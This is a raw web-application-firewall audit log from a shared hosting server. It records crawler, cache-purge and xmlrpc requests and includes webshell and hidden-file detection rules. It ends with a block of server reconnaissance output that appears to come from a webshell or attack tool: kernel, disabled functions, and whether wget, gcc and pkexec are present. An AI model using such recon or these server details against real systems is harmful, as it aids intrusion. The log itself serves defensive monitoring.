1751366867547536 2832539; combined=3731, p1=124, p2=3322, p3=0, p4=0, p5=284, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --8dde0d79-Z-- --f2b45e72-A-- [01/Jul/2025:16:17:51.655601 +0530] aGO81krSSSG5LnhUxKLOigAAAAY 43.166.239.145 54052 192.168.74.40 80 --f2b45e72-B-- GET / HTTP/1.1 Host: www.direct-leadz.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --f2b45e72-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/7.4.33 X-Redirect-By: WordPress -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366872539168 41996 (- - -) Stopwatch2: 1751366872539168 41996; combined=1642, p1=91, p2=1393, p3=0, p4=0, p5=157, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bcd0481e-Z-- --0a3ef32e-A-- [01/Jul/2025:16:17:53.198397 +0530] aGO81ktSp2OH4H2d_eHgkQAAABs 103.185.74.40 57635 192.168.74.40 443 --0a3ef32e-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --0a3ef32e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0a3ef32e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366870592296 2606441 (- - -) Stopwatch2: 1751366870592296 2606441; combined=2269, p1=86, p2=2003, p3=0, p4=0, p5=179, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0a3ef32e-Z-- --172ceb3a-A-- [01/Jul/2025:16:17:53.227017 +0530] aGO82UrSSSG5LnhUxKLOiwAAAAY 162.158.49.2 49512 192.168.74.40 443 --172ceb3a-B-- GET /wp-includes/images/about.php HTTP/1.1 Host: mail.metalindustries.net.in X-Real-IP: 52.169.49.249 X-Remote-IP: 162.158.49.2 x-forwarded-for: 52.169.49.249 cf-ray: 958553ecd9acbde6-DUB x-forwarded-proto: https accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 cf-connecting-ip: 52.169.49.249 cf-ipcountry: IE cf-visitor: {"scheme":"https"} --172ceb3a-F-- HTTP/1.1 500 Internal Server Error -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f51bb641-Z-- --da811d6b-A-- [01/Jul/2025:16:31:07.993145 +0530] aGO_87iu8Ctm-L1ehvXssQAAACk 43.167.232.38 42792 192.168.74.40 80 --da811d6b-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --da811d6b-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --da811d6b-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751367667986283 7375 (- - -) Stopwatch2: 1751367667986283 7375; combined=4448, p1=106, p2=4054, p3=102, p4=3, p5=183, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --da811d6b-Z-- --97424c30-A-- [01/Jul/2025:16:31:08.767447 +0530] aGO_9OOoUsizXiPWPOxA8gAAACc 20.171.207.232 52052 192.168.74.40 443 --97424c30-B-- GET /https/js/rajasthan-tours-from-udaipur/images/aainag/https/Rajasthan-Travel-Guides/hotels-bharatpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --97424c30-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --97424c30-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/js/rajasthan-tours-from-udaipur/images/aainag/https/Rajasthan-Travel-Guides/hotels-bharatpur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370352869493 7398 (- - -) Stopwatch2: 1751370352869493 7398; combined=4146, p1=112, p2=3828, p3=81, p4=2, p5=122, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2afb1404-Z-- --bddf617b-A-- [01/Jul/2025:17:15:52.912913 +0530] aGPKboBbBh8xonO0WluYLAAAAEw 103.185.74.40 15538 192.168.74.40 443 --bddf617b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --bddf617b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --bddf617b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370350206707 2706722 (- - -) Stopwatch2: 1751370350206707 2706722; combined=3256, p1=118, p2=2958, p3=0, p4=0, p5=179, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bddf617b-Z-- --0d19d407-A-- [01/Jul/2025:17:15:53.199603 +0530] aGPKceYik73wHoe5IiM-vAAAAD8 20.171.207.232 34248 192.168.74.40 443 --0d19d407-B-- GET /https/js/rajasthan-tours-from-udaipur/images/aainag/https/aainag/Rajasthan-Travel-Guides/https/Car-Rentals-Jaisalmer.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --0d19d407-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0d19d407-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370354350202 19152 (- - -) Stopwatch2: 1751370354350202 19152; combined=3595, p1=159, p2=3190, p3=0, p4=0, p5=182, sr=59, sw=0, l=0, gc=64 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --5e79f96a-Z-- --6de1af0f-A-- [01/Jul/2025:17:15:55.434024 +0530] aGPKcbObF00q5bHw3UFktQAAAD0 103.185.74.40 48566 192.168.74.40 443 --6de1af0f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --6de1af0f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6de1af0f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370353127183 2307429 (- - -) Stopwatch2: 1751370353127183 2307429; combined=3359, p1=122, p2=3088, p3=0, p4=0, p5=149, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6de1af0f-Z-- --885e0f5b-A-- [01/Jul/2025:17:15:55.493766 +0530] aGPKc-Yik73wHoe5IiM-vgAAAD8 20.171.207.232 34248 192.168.74.40 443 --885e0f5b-B-- GET /https/js/rajasthan-tours-from-udaipur/images/aainag/https/images/images/Rajasthan-Travel-Guides/Car-Rentals-Jaisalmer.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --885e0f5b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Stopwatch: 1751370903086568 6808 (- - -) Stopwatch2: 1751370903086568 6808; combined=4113, p1=122, p2=3773, p3=87, p4=2, p5=128, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --dff57532-Z-- --46817e5c-A-- [01/Jul/2025:17:25:03.147462 +0530] aGPMk-_YqMFDEtUo0GAmqQAAAEM 103.185.74.40 52372 192.168.74.40 443 --46817e5c-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --46817e5c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --46817e5c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370899724822 3423266 (- - -) Stopwatch2: 1751370899724822 3423266; combined=3538, p1=126, p2=3253, p3=0, p4=0, p5=158, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --46817e5c-Z-- --6b57b74f-A-- [01/Jul/2025:17:25:03.576331 +0530] aGPMlmwJ_aQ0hbV9cecSIwAAAD0 84.17.49.3 6582 192.168.74.40 443 --6b57b74f-B-- POST /contact.html HTTP/1.0 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0 Referer: https://n-pillarsconstruction.com/contact.html Content-Type: application/x-www-form-urlencoded Host: n-pillarsconstruction.com Content-Length: 1046 Connection: close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370904334464 17115 (- - -) Stopwatch2: 1751370904334464 17115; combined=3258, p1=201, p2=2871, p3=0, p4=0, p5=186, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --78566018-Z-- --128a240a-A-- [01/Jul/2025:17:25:05.342523 +0530] aGPMl6kAVM45AaS5iCEktAAAACA 103.185.74.40 35191 192.168.74.40 443 --128a240a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --128a240a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --128a240a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370903360662 1982536 (- - -) Stopwatch2: 1751370903360662 1982536; combined=2237, p1=89, p2=2000, p3=0, p4=0, p5=148, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --128a240a-Z-- --c3e17a6b-A-- [01/Jul/2025:17:25:05.603986 +0530] aGPMmd_4OFIsSrSdm2HukQAAAAM 57.141.0.20 49454 192.168.74.40 443 --c3e17a6b-B-- GET /rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-udaipur/rajasthan-tours-from-udaipur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/images/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/hotels-pushkar.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --c3e17a6b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370905586998 17271 (- - -) Stopwatch2: 1751370905586998 17271; combined=4180, p1=191, p2=3834, p3=0, p4=0, p5=155, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --c3e17a6b-Z-- --20b0a702-A-- [01/Jul/2025:17:25:06.325876 +0530] aGPMmM9hXnEoHqdOc_WSVwAAACs 103.185.74.40 2997 192.168.74.40 443 --20b0a702-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --20b0a702-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --20b0a702-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370904949645 1376871 (- - -) Stopwatch2: 1751370904949645 1376871; combined=2105, p1=100, p2=1893, p3=0, p4=0, p5=112, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --20b0a702-Z-- --b9a71c31-A-- [01/Jul/2025:17:25:06.697454 +0530] aGPMmrKysGa6H_6VFYrFtgAAAA0 20.171.207.232 59346 192.168.74.40 443 --b9a71c31-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-jodhpur/images/aainag/Rajasthan-Travel-Guides/hotels-jaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b9a71c31-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370906676360 22551 (- - -) Stopwatch2: 1751370906676360 22551; combined=5231, p1=227, p2=4812, p3=0, p4=0, p5=191, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b9a71c31-Z-- --8d0e441b-A-- [01/Jul/2025:17:25:07.664433 +0530] aGPMmo2CCPnviuEK39SVPQAAABg 103.185.74.40 8851 192.168.74.40 443 --8d0e441b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --8d0e441b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8d0e441b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370906534074 1130584 (- - -) Stopwatch2: 1751370906534074 1130584; combined=2150, p1=90, p2=1894, p3=0, p4=0, p5=166, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8d0e441b-Z-- --e6041736-A-- [01/Jul/2025:17:25:08.836707 +0530] aGPMme_YqMFDEtUo0GAmqgAAAEM 45.134.226.158 48966 192.168.74.40 443 --e6041736-B-- POST /xmlrpc.php HTTP/1.1 Host: www.sudershanmachinery.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0 Content-Length: 482 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip Connection: close --e6041736-C--
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.89 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode: Off
disable_functions: None
allow_url_fopen: On
allow_url_include: Off
magic_quotes_gpc: Off
register_globals: Off
open_basedir: None
cURL: Enabled
ZipArchive: Disabled
MySQLi: Enabled
PDO: Enabled
wget: Yes
curl (cmd): Yes
perl: Yes
python: Yes
gcc: Yes
pkexec: No
git: Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A